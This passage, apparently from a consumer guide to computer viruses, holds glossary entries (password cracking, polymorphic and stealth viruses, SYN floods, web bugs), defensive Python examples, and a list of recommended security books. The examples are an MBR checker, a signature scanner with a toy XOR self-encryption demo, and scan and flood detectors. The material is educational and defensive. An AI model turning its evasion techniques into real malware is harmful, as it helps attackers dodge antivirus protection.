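entries starting at byte 446, and the 0x55AA signature in bytes 510-511.
"""
import hashlib
import struct

MBR_SIZE = 512
TABLE_OFFSET = 446
ENTRY_SIZE = 16
ENTRY_FORMAT = "<B3sB3sII"   # status, CHS start, type, CHS end, LBA start, sector count
BOOT_SIGNATURE = b"\x55\xaa"


def build_demo_mbr(boot_code: bytes, partitions: list) -> bytes:
    """Assemble a constructed MBR from boot code and (status, type, lba_start, sectors) tuples."""
    sector = bytearray(MBR_SIZE)
    sector[:len(boot_code)] = boot_code
    for index, (status, type_code, lba_start, sectors) in enumerate(partitions[:4]):
        start = TABLE_OFFSET + index * ENTRY_SIZE
        # CHS fields are zeroed: modern systems rely on the LBA fields.
        sector[start:start + ENTRY_SIZE] = struct.pack(
            ENTRY_FORMAT, status, b"\0\0\0", type_code, b"\0\0\0", lba_start, sectors)
    sector[510:512] = BOOT_SIGNATURE
    return bytes(sector)


def parse_mbr(sector: bytes) -> dict:
    """Decode the signature, the partition table and a hash of the boot-code region."""
    if len(sector) != MBR_SIZE:
        raise ValueError("an MBR sector is exactly 512 bytes")
    partitions = []
    for index in range(4):
        start = TABLE_OFFSET + index * ENTRY_SIZE
        status, _, type_code, _, lba_start, sectors = struct.unpack(
            ENTRY_FORMAT, sector[start:start + ENTRY_SIZE])
        if type_code == 0 and sectors == 0:
            continue  # unused slot
        partitions.append({"index": index, "status": status, "active": status == 0x80,
                           "type": type_code, "lba_start": lba_start, "sectors": sectors})
    return {
        "valid_signature": sector[510:512] == BOOT_SIGNATURE,
        "boot_code_sha256": hashlib.sha256(sector[:TABLE_OFFSET]).hexdigest(),
        "partitions": partitions,
    }


def check_mbr(sector: bytes, baseline_boot_sha256: str) -> list:
    """Return integrity findings. The baseline hash is one recorded while the
    disk was known clean; an infector that rewrites the boot code changes it."""
    info = parse_mbr(sector)
    findings = []
    if not info["valid_signature"]:
        findings.append("boot signature 0x55AA missing")
    if info["boot_code_sha256"] != baseline_boot_sha256:
        findings.append("boot code differs from known-good baseline")
    if sum(p["active"] for p in info["partitions"]) > 1:
        findings.append("more than one active partition")
    for p in info["partitions"]:
        if p["status"] not in (0x00, 0x80):
            findings.append(f"partition {p['index']} has invalid status byte 0x{p['status']:02x}")
    ordered = sorted(info["partitions"], key=lambda p: p["lba_start"])
    for a, b in zip(ordered, ordered[1:]):
        if a["lba_start"] + a["sectors"] > b["lba_start"]:
            findings.append(f"partitions {a['index']} and {b['index']} overlap")
    return findings


# Constructed demo data: made-up boot-code bytes, an active NTFS-type (0x07)
# partition and a Linux-type (0x83) partition.
DEMO_BOOT_CODE = b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c"
DEMO_PARTITIONS = [(0x80, 0x07, 2048, 204800), (0x00, 0x83, 206848, 409600)]
CLEAN_MBR = build_demo_mbr(DEMO_BOOT_CODE, DEMO_PARTITIONS)
BASELINE_HASH = parse_mbr(CLEAN_MBR)["boot_code_sha256"]


def tampered_mbr() -> bytes:
    """Same partition table, but the first boot-code bytes replaced: what a
    rewritten boot sector looks like to the checker."""
    sector = bytearray(CLEAN_MBR)
    sector[:4] = b"\xeb\xfe\x90\x90"   # constructed replacement bytes
    return bytes(sector)


if __name__ == "__main__":
    print(parse_mbr(CLEAN_MBR)["partitions"])
    print(check_mbr(CLEAN_MBR, BASELINE_HASH))
    print(check_mbr(tampered_mbr(), BASELINE_HASH))
```

Reading the real sector 0 of a disk is an administrative operation and is deliberately left out; the checker accepts any 512-byte buffer. The baseline hash is the defensive idea worth keeping: parsing alone cannot tell good boot code from bad, but a change in a region that should never change between operating-system installs is a strong signal.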

Password Cracker

A tool to decrypt a password or password file, covering both programs that take an algorithmic approach to cracking and those that use brute force with a password cracking word list. Password crackers have legitimate uses by security administrators, who want to find weak passwords in order to change them and improve system security.

Password Cracking Word List

A list of words that a brute force password cracker can use to muscle its way into a system.

Payload

Refers to the effects produced by a virus attack. Sometimes refers to a virus associated with a dropper or Trojan horse.

Pervasiveness

Pervasiveness refers to a virus’ potential to spread.

Polymorphic Virus

Polymorphic viruses create varied (though fully functional) copies of themselves as a way to avoid detection by anti-virus software. Some polymorphic viruses use different encryption schemes and require different decryption routines. Thus, the same virus may look completely different on different systems or even within different files. Other polymorphic viruses vary instruction sequences and use false commands in an attempt to thwart anti-virus software. One of the most advanced polymorphic viruses uses a mutation engine and random-number generators to change the virus code and its decryption routine.

Port Scanner

In hacker reconnaissance, a port scan attempts to connect to all 65536 ports on a machine in order to see if anybody is listening on those ports.

POP3 or Post Office Protocol 3

A protocol that provides a simple, standardised way for users to access mailboxes and download messages to their computers.

Prepender

A virus that inserts a copy of its code at the beginning of the code of its victim file is known as a prepender or prepending virus.

Probe Tool

A tool that explores another system, looking for vulnerabilities. While these can be used by security managers wishing to tighten up their security, the tools are as likely used by attackers to evaluate where to start an attack.

Proof of Concept, POC

The term is commonly used to describe a virus that is the first to infect a given platform or implement a given infection technique.

Password Attacks

A password attack is an attempt to obtain or decrypt a legitimate user’s password. Hackers can use password dictionaries, cracking programs, and password sniffers in password attacks. Defense against password attacks is rather limited, but usually consists of a password policy including a minimum length, unrecognisable words, and frequent changes.

Password Sniffing

The use of a sniffer to capture passwords as they cross a network. The network could be a local area network, or even the Internet itself. The sniffer can be hardware or software. Most sniffers are passive and only log passwords. The attacker must then analyse the logs later.

Piggyback

To gain access to a system via an authorised user’s connection.
Program Infector

A program infector virus infects other program files once an infected application is executed and the activated virus is loaded into memory.

RAM, Random Access Memory

Memory-transient programs are loaded into RAM so they can be executed. It is the memory that must be used for revisable data storage, regardless of the location of the program manipulating the data.

RAT, Remote Access Trojan, Remote Access Trapdoor

Remote Administration Tool. There are legitimate remote administration tools included with many network management products, with helpdesk and other support software, and the like. These are installed with the system administrator’s knowledge and consent.

Registry

The registry is a database used by the Windows32 operating system (Win9x/ME/NT/2000/XP) to store configuration settings.

Remnant

There are many approaches to disinfecting virus-infected objects. As a result, some people are surprised to learn that not all products remove all traces of a virus when disinfecting. Should this happen, the remaining virus code will not be ‘active’— it will not be able to gain control in the flow of execution— so the disinfected object is still ‘safe’. These snippets of leftover code are sometimes referred to as remnants.

Resident Virus

A resident virus loads into memory and remains inactive until a trigger event. When the event occurs the virus activates, either infecting a file or disk, or causing other consequences. All boot viruses are resident viruses and so are the most common file viruses.

Retro-virus

Loosely based on the biological concept with the same name, computer viruses that attack antivirus products are sometimes referred to as retro-viruses.

Real-time Scanner

An anti-virus software application that operates as a background task, allowing the computer to continue working at normal speed, with no perceptible slowing.

Redirect

The action used by some viruses to point a command to a different location. Often this different location is the address of the virus and not the original file or application.

Rename

The action by which a user or program assigns a new name to a file. Viruses may rename program files and take the name of the file so running the program inadvertently runs the virus.

Replication

The process by which a virus makes copies of itself in order to carry out subsequent infections. Replication is one of the major criteria separating viruses from other computer programs.

Resident Extension

A resident extension is a memory-resident portion of a program that remains active after the program ends. It essentially becomes an extension to the operating system. Many viruses install themselves as resident extensions.

ROM, Read-Only Memory

Apart from its contents normally not being modifiable, ROM is usually also non-volatile. This type of memory is traditionally used to hold a PC’s BIOS and little else, although various kinds of ‘modifiable ROM’ memory technologies, such as EPROM, EEPROM and flash memory, have been used through the years, with flash memory being preferred in recent years.
Rogue Program

A term the media use to denote any program intended to damage programs or data, or to breach a system’s security. It includes trojan horse programs, logic bombs, viruses, and more.

Search Hijacker

Any software that resets your browser’s settings to point to other sites when you perform a search.

Self-Encrypting Virus

Self-encrypting viruses attempt to conceal themselves from anti-virus programs. Most anti-virus programs attempt to find viruses by looking for certain patterns of code (known as virus signatures) that are unique to each virus. Self-encrypting viruses encrypt these text strings differently with each infection to avoid detection. See Self-garbling Virus, Encrypted Virus

Self-Garbling Virus

A self-garbling virus attempts to hide from anti-virus software by garbling its own code. When these viruses spread, they change the way their code is encoded so anti-virus software cannot find them. A small portion of the virus code decodes the garbled code when activated. See Also: Self-encrypting Virus, Polymorphic Virus.

Signature

A search pattern, often a simple string of characters or bytes, expected to be found in every instance of a particular virus. Usually, different viruses have different signatures. Anti-virus scanners use signatures to locate specific viruses. Also: Virus Signatures
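To make concrete what the Self-Encrypting Virus, Self-Garbling Virus and Signature entries describe, here is an added Python example (not the book's code) built around a toy signature scanner. The 'virus body', the constant decoder stub and the sample files are constructed byte strings; the stub and a one-byte XOR stand in for whatever decoding routine real self-encrypting code carries. It shows three things: a fixed signature on the body finds the plain copy; two encrypted copies of the same body look different from each other and slip past that signature; and the invariant decoder stub can still be signatured, or decoded through, to recover the detection.

```python
"""Toy byte-signature scanner, showing what a fixed signature catches and why
self-encrypting code slips past it. Added example; the 'virus body', decoder
stub and sample files are constructed byte strings, not real malware."""

# Constructed body that a scanner would signature, and the signature itself.
DEMO_BODY = b"\x90DEMO-REPLICATE-CODE\x90"
SIGNATURES = {"Demo.A": b"DEMO-REPLICATE-CODE"}

# Constructed invariant decoder stub: marker bytes followed by one key byte.
# Self-encrypting code must carry some constant decoder, and that is what
# stays signaturable once the body itself is encrypted.
STUB_MARKER = b"DEC\x01"
SIGNATURES_WITH_STUB = {**SIGNATURES, "Demo.A.stub": STUB_MARKER}


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def self_encrypted_copy(body: bytes, key: int) -> bytes:
    """A copy as a self-encrypting virus would write it: constant stub,
    the key byte, then the body XORed with that key (different per infection)."""
    return STUB_MARKER + bytes([key]) + xor_bytes(body, key)


def scan(data: bytes, signatures: dict) -> list:
    """Plain signature scanner: names of every signature found in the data."""
    return [name for name, pattern in signatures.items() if pattern in data]


def scan_with_decoding(data: bytes, signatures: dict) -> list:
    """Scanner that recognises the stub, recovers the key, decodes what follows
    and scans the decoded bytes too (a crude version of what emulating scanners do)."""
    hits = scan(data, signatures)
    at = data.find(STUB_MARKER)
    if at != -1 and at + len(STUB_MARKER) < len(data):
        key = data[at + len(STUB_MARKER)]
        decoded = xor_bytes(data[at + len(STUB_MARKER) + 1:], key)
        hits += [name for name in scan(decoded, signatures) if name not in hits]
    return hits


# Constructed sample "files".
CLEAN_FILE = b"MZ" + b"ordinary program code " * 4
INFECTED_FILE = b"MZ" + b"ordinary program code " + DEMO_BODY
ENCRYPTED_A = b"MZ" + b"ordinary program code " + self_encrypted_copy(DEMO_BODY, 0x5A)
ENCRYPTED_B = b"MZ" + b"ordinary program code " + self_encrypted_copy(DEMO_BODY, 0x3C)

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN_FILE), ("infected", INFECTED_FILE),
                          ("encrypted A", ENCRYPTED_A), ("encrypted B", ENCRYPTED_B)]:
        print(label, scan(sample, SIGNATURES), scan(sample, SIGNATURES_WITH_STUB),
              scan_with_decoding(sample, SIGNATURES))
```

The last point is exactly where the polymorphic viruses of the earlier entry go further: they vary the decoder as well, so neither the body signature nor the stub signature holds, and scanners have to fall back on emulation or heuristics rather than fixed patterns.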

Slow Mailer

A slow mailer is a virus that distributes itself from victim machines via e-mail but not in the ‘explosive’ manner attributed to mass mailers.

Slow Polymorphism

A term occasionally applied to polymorphic viruses that only morph their code ‘occasionally’ rather than each time they replicate, as is more common. This is an ‘anti-antivirus research’ technique.

SMTP

Simple Mail Transport Protocol. The Internet e-mail delivery format for transmitting e-mail messages between servers.

Sniffer

A wiretap that eavesdrops on computer networks. The attacker must be between the sender and the receiver in order to sniff traffic. This is easy in corporations using shared media. Sniffers are frequently used as part of automated programs to sift information off the wire, such as clear-text passwords, and sometimes password hashes (to be cracked).

Social Engineering

There are two main ways to obtain technical or administrative information about a computer system. The first is from the systems themselves and the second is from the administrators and users of the machines. Surreptitious or unauthorised attempts to obtain such system information are known as hacking or cracking if the attempt involves obtaining information from the machines, and are called social engineering if the attempts involve manipulating or ‘tricking’ a person into divulging the information.

SOCKS Proxy

Socks (or SOCKS) is an IETF standard protocol for TCP/IP-based networking applications. A proxy server (a server that sits between a client application and a real server) can use SOCKS to accept requests from clients so that they can be forwarded across the Internet. Socks uses sockets to represent and keep track of individual connections.

SPAM Tool

Any software designed to extract e-mail addresses from Web sites and other sources, remove ‘dangerous’ or ‘illegal’ addresses, and/or efficiently send unsolicited (and perhaps untraceable) mail to these addresses.

Sparse Infector

Just like slow infection methods, sparse infection is also an approach to reduce the chances of early detection. The main idea is to replicate only occasionally; for example, only infecting one in every 100 programs that are executed.

Spyware

A program that gathers information and can be ‘silently’ installed and run in ‘stealth’ mode. This kind of software is used to gather information from a user’s machine, such as recorded keystrokes (passwords), a list of Web sites visited by the user, applications installed on the machine, the version of operating system, registry settings and so on.

Spyware Cookie

Any cookie that is shared among two or more unrelated sites for the purpose of gathering and sharing private user information.

Stealth Virus

Stealth viruses attempt to conceal their presence from anti-virus software. Many stealth viruses intercept disk-access requests, so when an anti-virus application tries to read files or boot sectors to find the virus, the virus feeds the program a ‘clean’ image of the requested item. Other viruses hide the actual size of an infected file and display the size of the file before infection.

Surveillance

Any software designed to use a Web cam, microphone, screen capture, or other approaches to monitor and capture information. Some such software will transmit this captured information to a remote source.
SYN Flood Attack

In the normal course of a TCP connection, a SYN (TCP connection request) is sent to a target computer. When the target computer receives the SYN, it sends a SYN_RECEIVED message back to the machine that sent the SYN (reading the IP source address of the originating packet). The target computer then waits for the machine that originated the request to send back a SYN_ACK upon receipt of its SYN_RECEIVED message (this SYN-RECEIVED state is saved in a buffer either until the ACK is received or until the request has been waiting for a particular finite period of time and is then purged). When this three-way handshake is completed, data can travel freely between the two computers.
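The entry above stops at the handshake; the attack takes its name from flooding a host with SYNs whose handshakes never complete, so the buffered SYN-RECEIVED entries pile up until the queue is exhausted and genuine requests are dropped. The added Python example below (not from the book) takes the defender's view of that fact, and of the Port Scanner entry earlier in this glossary, and applies it to a constructed connection log: one source touching many distinct ports of a host within a short window is reported as a scan, and many SYNs to one port that never receive the completing ACK are reported as a flood. The log format, the thresholds and all addresses are assumptions made for the demo.

```python
"""Spot port scans and SYN floods in connection-log lines.

Added example; the log format and every address are constructed for this
demo (documentation ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24).
Each line: <ISO timestamp> <src ip> <dst ip> <dst port> <flags>, where flag
'S' is a bare SYN and 'A' is the ACK that completes the handshake.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def build_demo_log() -> str:
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    # One source walking 30 ports of a single host, one port per second.
    for i in range(30):
        t = (base + timedelta(seconds=i)).isoformat()
        lines.append(f"{t} 203.0.113.5 198.51.100.10 {1 + i} S")
    # Sixty connection requests to port 80, each from a different
    # (constructed) source, none of which ever sends the ACK.
    for i in range(60):
        t = (base + timedelta(seconds=i // 10)).isoformat()
        lines.append(f"{t} 192.0.2.{i + 1} 198.51.100.10 80 S")
    # A legitimate client completing five handshakes to port 443.
    for i in range(5):
        t = (base + timedelta(seconds=i * 2)).isoformat()
        lines.append(f"{t} 198.51.100.20 198.51.100.10 443 S")
        lines.append(f"{t} 198.51.100.20 198.51.100.10 443 A")
    return "\n".join(lines)


def parse_log(text: str) -> list:
    events = []
    for line in text.splitlines():
        ts, src, dst, dport, flags = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
                       "dport": int(dport), "flags": flags})
    return events


def detect_port_scans(events: list, min_ports: int = 15, window_seconds: int = 60) -> list:
    """A scan looks like one source sending SYNs to many distinct ports of a
    host within a short window. Returns (src, dst, distinct_ports) per offender."""
    syns = defaultdict(list)
    for e in events:
        if e["flags"] == "S":
            syns[(e["src"], e["dst"])].append(e)
    alerts = []
    for (src, dst), evs in syns.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        for end in range(len(evs)):            # sliding time window
            while (evs[end]["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            best = max(best, len({e["dport"] for e in evs[start:end + 1]}))
        if best >= min_ports:
            alerts.append((src, dst, best))
    return alerts


def detect_syn_floods(events: list, max_half_open: int = 50) -> list:
    """Half-open connections are SYNs for which the same source never sends the
    completing ACK; too many of them on one (dst, port) is the flood signature.
    Returns (dst, dport, half_open_count) per flooded service."""
    completed = {(e["src"], e["dst"], e["dport"]) for e in events if e["flags"] == "A"}
    half_open = defaultdict(int)
    for e in events:
        if e["flags"] == "S" and (e["src"], e["dst"], e["dport"]) not in completed:
            half_open[(e["dst"], e["dport"])] += 1
    return [(dst, port, n) for (dst, port), n in half_open.items() if n >= max_half_open]


if __name__ == "__main__":
    evs = parse_log(build_demo_log())
    print(detect_port_scans(evs))
    print(detect_syn_floods(evs))
```

The two detectors deliberately key on different things: a scan is one source against many ports, a flood is many requests against one port, and a spoofed flood spreads its requests over sources that never reply, which is why the flood check counts unanswered SYNs per service rather than per source.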

Telnet Server

Software that allows a remote user of a Telnet client to connect as a remote terminal from anywhere on the Internet and control a computer on which the server software is running.

Time Bomb

A logic bomb with its trigger condition(s) based on absolute or elapsed date or time conditions.

TOM

Top of Memory. A design limit at the 640 KB mark on most PCs. Often the boot record does not completely reach top of memory, thus leaving empty space. Boot sector infectors often try to conceal themselves by hiding around the top of memory. Checking the top of memory value for changes can help detect a virus, though there are also non-viral reasons for this value to change.

Tracking Cookie

Any cookie that is shared among two or more Web pages for the purpose of tracking a user’s surfing history.

Trigger

The condition that determines the launching of a virus’ or Trojan’s payload is usually called the trigger or trigger condition. Trigger is also used as a verb to indicate the activation of a payload.

Trojan, Trojan Horse

A Trojan horse program is a malicious program that pretends to be a benign application; a Trojan horse program does something the user does not expect. Trojans are not viruses since they do not replicate, but they can be just as destructive.

Trojan Creation Tool

A program designed to create Trojans. Some of these tools merely wrap existing Trojans, to make them harder to detect. Others add a trojan to an existing product (such as RegEdit.exe), making it a Dropper.

Trojan Source

Source code is written by a programmer in a high-level language and readable by people but not computers. Source code must be converted to object code or machine language before a computer can read or execute the program. Trojan Source can be compiled to create working trojans, or modified and compiled by programmers to make new working trojans.

Timestamp

The time of creation or last modification recorded on a file or another object. Users can usually find the timestamp in the Properties section of a file.

TSR

Terminate and Stay Resident. TSR programs stay in memory after being executed. TSR programs allow the user to quickly switch back and forth between programs in a non-multitasking environment, such as MS-DOS. Some viruses are TSR programs that stay in memory to infect other files and programs. Also: Memory-resident Program

Tunnelling

A virus technique designed to prevent anti-virus applications from working correctly. Anti-virus programs work by intercepting the operating system actions before it can execute a virus. Tunnelling viruses try to intercept actions before the anti-virus software can detect the malicious code. New anti-virus programs can recognise many viruses with tunnelling behaviour.

Usage Tracks

Usage tracks permit any user (or their software agent) with access to your computer to see what you’ve been doing. Such tracks benefit you if you have left the tracks, but might benefit another user as well.

Virus

A computer program file capable of attaching to disks or other files and replicating itself repeatedly, typically without user knowledge or permission. Some viruses attach to files so when the infected file executes, the virus also executes. Other viruses sit in a computer’s memory and infect files as the computer opens, modifies or creates the files. Some viruses display symptoms, and some viruses damage files and computer systems, but neither symptoms nor damage is essential in the definition of a virus; a non-damaging virus is still a virus.

Virus Creation Tool

A program designed to generate viruses. Even early virus creation tools were able to generate hundreds or thousands of different, functioning viruses, which were initially undetectable by current scanners.

Web Bug

A Web bug is a device used in HTML Web pages and e-mail to monitor who is reading the Web page or e-mail. These are small, hidden, difficult-to-detect eavesdropping devices. Most of the time, you will not even be aware that these bugs exist, as they hide within 1-by-1 pixel HTML image tags, although any graphic on a Web page or in an e-mail can be configured to act as a Web bug. This is not to say that all invisible GIFs on Web pages are Web bugs; some invisible GIF files are used for alignment and design purposes.
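As an added example for this entry (written for this page, not the book's code), the Python below scans an HTML document for likely Web bugs using the criteria the entry gives: a 1-by-1 pixel or style-hidden image is only reported when it also points to a third-party host or carries a query string that could identify the recipient, so plain spacer GIFs used for layout are left alone. The sample page and the hostnames in it are constructed (reserved example domains).

```python
"""Flag likely Web bugs in HTML: tiny or hidden <img> tags whose source points
off-site or carries a query string. Added example, not from the book; the
page and the hostnames in it are constructed. Invisible images with neither
tracking feature are not reported, since some only serve layout."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


def parse_dimension(value):
    """'1', '1px', ' 1 ' -> 1; missing or non-numeric -> None."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class WebBugFinder(HTMLParser):
    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        parsed = urlparse(src)
        width, height = parse_dimension(a.get("width")), parse_dimension(a.get("height"))
        style = (a.get("style") or "").replace(" ", "").lower()

        invisible = []
        if width is not None and height is not None and width <= 1 and height <= 1:
            invisible.append("1x1 pixel")
        if "display:none" in style or "visibility:hidden" in style:
            invisible.append("hidden by style")
        if not invisible:
            return  # a normally sized, visible image

        tracking = []
        if parsed.hostname and parsed.hostname.lower() != self.page_host:
            tracking.append(f"third-party host {parsed.hostname}")
        if parsed.query:
            tracking.append("query string (possible per-recipient identifier)")
        if tracking:  # invisible AND able to report back on the reader
            self.findings.append({"src": src, "reasons": invisible + tracking})


def find_web_bugs(html: str, page_host: str) -> list:
    """Return one finding per suspected Web bug in the document."""
    finder = WebBugFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page served from www.example.com.
SAMPLE_PAGE = """<html><body>
<img src="/images/spacer.gif" width="1" height="1" alt="">
<img src="http://tracker.example.net/pixel.gif?uid=12345" width="1" height="1">
<img src="/photos/cat.jpg" width="400" height="300">
<img src="https://cdn.example.net/logo.png" width="120" height="40">
<img src="http://tracker.example.net/p.gif" style="display: none">
<img src="/open.gif?msg=42" width="1px" height="1px">
</body></html>"""

if __name__ == "__main__":
    for finding in find_web_bugs(SAMPLE_PAGE, "www.example.com"):
        print(finding["src"], "->", ", ".join(finding["reasons"]))
```

The same check transfers to HTML e-mail, where the query-string case matters most: a unique identifier in the image URL tells the sender exactly which recipient opened the message, which is why mail clients that block remote images by default blunt this kind of bug.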
WildList

Although there are many thousands of known viruses, few actually cause any real-world concern, and those that do are often said to be ‘in the wild’. However, the term ‘in the wild’ has been used in many different contexts and with many different shades of meaning. In an attempt to clear this situation up, for computer viruses, antivirus researcher Joe Wells instigated what he called the WildList. Its purpose was to provide a listing of viruses that could (or should) be considered ‘in the wild’ by set criteria.

Worm

Worms are parasitic computer programs that replicate, but unlike viruses, do not infect other computer program files. Worms can create copies on the same computer, or can send the copies to other computers via a network.

Worm Creation Tool

A program designed to generate worms. Worm creation tools can often generate hundreds or thousands of different, functioning worms, most of which are initially undetectable by current scanners.

Windows Scripting

Windows Scripting Host (WSH) is a Microsoft integrated module that lets programmers use any scripting language to automate operations throughout the Windows desktop.

Zoo

A collection of viruses used for testing by researchers.
Knowledge is power. When it comes to viruses and security threats, the more you know, the more prepared you can be. We have covered just about all the important subjects related to viruses that an average computer user should know, but you can always learn more. Luckily, the information is easy to find. We have listed a selection of useful books and Web sites that can help you learn just about everything you need to know about defending yourself against various threats arising from malicious software or otherwise.
Computer Viruses For Dummies

Author: Peter H Gregory
Publisher: John Wiley & Sons, Inc

Just the thought of your trusty PC catching a computer virus is probably enough to make you sick. Thanks to the annoying virus writers who persist in coming up with new strains, there’s a major new cyberattack nearly every day. Viruses just happen to sneak in from various sources. Fortunately, there are ways to inoculate and protect your computer.

Computer Viruses For Dummies helps you understand the risks and analyse your PC’s current condition. It also helps in selecting, installing, and configuring the antivirus software along with giving you information on scanning your computer and e-mail and ridding your computer of viruses that it’s already caught.

There’s helpful information on the use of firewalls and spyware blockers, protecting handheld PDAs from viruses and adopting safe computing practices, especially with e-mail and when you are surfing the Internet.
A Short Course on Computer Viruses

Author: Frederick Cohen
Publisher: John Wiley & Sons, Inc

Here is an outstanding opportunity to learn about computer viruses from the internationally acclaimed pioneer in the field who actually coined the phrase “computer virus.” This new edition of Cohen’s classic work has been updated and expanded to nearly double its original size and now includes entirely new chapters on LAN viruses, international viruses, and good viruses (including code).

As entertaining as it is thorough, the text is enlivened by Cohen’s down-to-earth wit and his many fascinating anecdotes and as yet unpublished historical facts about viruses. Both broad in its coverage and deep in its consideration, it includes dozens of lucid explanations and examples that amicably guide the reader through the complex, often convoluted subject matter. Hailed as a tour de force, Cohen’s discussion of defensive strategies reveals many of the stumbling blocks that often trip readers up.
Virus Proof: The Ultimate Guide To Protecting Your System

Author: Phil Schmauder
Publisher: Prima Publishing

Like biological viruses, computer viruses can spread quickly and are often difficult to get rid of without causing damage. Virus Proof: The Ultimate Guide to Protecting Your System provides key steps you should take to protect your system from these destructive viruses. Inside you will learn how to recover data that is lost as a result of a virus, what common viruses do, and how they spread.

Virus Proof is an excellent resource for any computer user, from beginners to experts.


Blocking Spam For Business For Dummies

Authors: Peter H Gregory, Mike Simon
Publisher: John Wiley & Sons, Inc

Despite recent legislation in the US and other countries, the volume of spam continues to grow. Spam now accounts for 60 to 75 per cent of all e-mail.

Blocking Spam For Business For Dummies shows small business people and corporate information security professionals how to fight back successfully against this onslaught, offering savvy advice on selecting and deploying a spam filter as well as training and supporting users. It also provides insider tips on troubleshooting and fine-tuning a spam filter, as well as exclusive guidance on how to deal with ‘Joe Jobs’ spam attacks, in which spammers hijack a corporate domain name.


Malware: Fighting Malicious Code

Authors: Ed Skoudis, Lenny Zeltser
Publisher: Prentice Hall PTR

Ignoring the threat of malware is one of the most reckless things you can do in today’s increasingly hostile computing environment. Malware is malicious code planted on your computer, and it can give the attacker a truly alarming degree of control over your system, network, and data, all without your knowledge! Written for computer pros and savvy home users by computer security expert Edward Skoudis, Malware: Fighting Malicious Code covers everything you need to know about malware, and how to defeat it!

This book devotes a full chapter to each type of malware— viruses, worms, malicious code delivered through Web browsers and e-mail clients, backdoors, Trojan horses, user-level RootKits, and kernel-level manipulation. You’ll learn about the characteristics and methods of attack, evolutionary trends, and how to defend against each type of attack. Real-world examples of malware attacks help you translate thought into action, and a special defender’s toolbox chapter shows how to build your own inexpensive code analysis lab to investigate new malware specimens on your own. Throughout, Skoudis’ clear, engaging style makes the material approachable and enjoyable to learn.

This book includes solutions and examples that cover both UNIX and Windows operating systems. There are practical, time-tested, real-world actions you can take to secure your systems specified in this book, along with instructions for building your own inexpensive malware code analysis lab so you can get familiar with attack and defensive tools harmlessly!


E-mail Virus Protection Handbook: Protect Your E-mail From Viruses, Trojan Horses, And Mobile Code Attacks

Authors: Brian Bagnall, James Stanger
Publisher: Syngress Publishing

E-mail has been called the killer application of the Internet, with so many Web-based commerce applications, business-to-business transactions, and Application Service Providers dependent on the e-mail client/server relationship. Now, because of that reliance, it is possible for e-mail software to become killer applications in an entirely different sense— if they’re down, they can kill your business. E-mail Virus Protection Handbook will help systems administrators and end-users secure their e-mail. It shows how to encrypt e-mail messages, use antivirus and personal firewall software, and secure the operating system from attack. Know what’s lurking in your e-mail!

Topics covered include malicious code that’s spread through e-mail clients, servers, and protocols, and how to defend against it. Specifically, the book deals with antivirus software, both network-wide and for single clients, and configuration policies for Outlook 2000, Outlook Express 5.0, and Eudora 4.3 on the client side. Server coverage includes Windows 2000 Advanced Server, Red Hat Linux 6.0, Exchange Server 5.5, and Sendmail. Personal firewalls, such as BlackICE Defender 2.1, get attention, too.

How  To  Do  Everything  To  Fight  Spam,  Viruses, 
Pop-Ups,  And  Spyware 


Author:  Ken  Feinstein 

Publisher:  McGraw-Hill  Osborne  Media 


Get expert advice on finally ridding your computer of annoying spam and pop-up ads and invasive viruses, spyware, and adware. You will discover where these electronic nuisances originate, how they work, and how to prevent them. Learn to choose spam-resistant e-mail addresses and get the most from your spam filter. Protect your computer from virus attacks with antivirus software and preventive measures. Also, find out how to avoid installing spyware and adware unknowingly, and block those pesky pop-up ads. The bonus CD-ROM features trial versions of the prevention tools covered in the book.

The book helps you understand how spammers operate and how to safeguard your e-mail addresses, along with using spam-filtering software and challenge-response mail systems. It shows you how to configure your PC to resist virus attacks, recognise virus-laden e-mails and avoid virus infection when downloading files. There's vital information on installing, configuring, and updating antivirus software, and diagnosing and removing viruses from your system; and also tips on how to avoid installing adware and spyware inadvertently.


Counter  Hack:  A Step-by-Step  Guide  To 
Computer  Attacks  And  Effective  Defenses 


Author:  Ed  Skoudis 
Publisher:  Prentice  Hall  PTR 

This next-generation hacker book gives you a step-by-step guide to defending against hacker intrusions. It shows how to defend against today's most powerful hacker attacks, how to detect intrusions that use new evasion techniques, and which countermeasures to apply. It's written by Edward Skoudis, the security expert who demonstrated hacking to the US Senate.

This easy-to-use, step-by-step guide will empower network and system administrators to defend their information and computing assets, whether or not they have security experience. In Counter Hack, leading network security expert Edward Skoudis presents comprehensive, insider's explanations of today's most destructive hacker tools and tactics, and specific, proven countermeasures for both UNIX and Windows environments.

Skoudis covers all this and more in topics such as:

o Know your adversary: from script kiddies to elite attackers.
o A hacker's view of networks, TCP/IP protocols, and their vulnerabilities.
o Five phases of hacking: reconnaissance, scanning, gaining access, maintaining access, and preventing detection.
o The most dangerous and widespread attack scenarios, explained in depth.
o Key hacker tools: port scanners, firewall scanners, sniffers, session hijackers, RootKits, and more.
o How hackers build elegant attacks from simple building blocks.
o Detecting and preventing IP spoofing, covert channels, denial of service attacks, and other key attacks.
o How hackers cover their tracks, and how you can uncover their handiwork.
o A preview of tomorrow's hacker tools, attacks, and countermeasures.

Whatever your role in protecting network infrastructure and data, Counter Hack delivers proven solutions you can implement right now, and long-term strategies that will improve security for years to come.

Firewalls  For  Dummies,  Second  Edition 


Authors: Brian Komar, Ronald Beekelaar, Joern Wettern
Publisher: John Wiley & Sons, Inc

What an amazing world we live in! Almost anything you can imagine can be researched, compared, admired, studied, and in many cases, bought, with the click of a mouse. The Internet has changed our lives, putting a world of opportunity before us. Unfortunately, it has also put a world of opportunity into the hands of those whose motives are less than honourable. A firewall, a piece of software or hardware that erects a barrier between your computer and those who might like to invade it, is one solution.

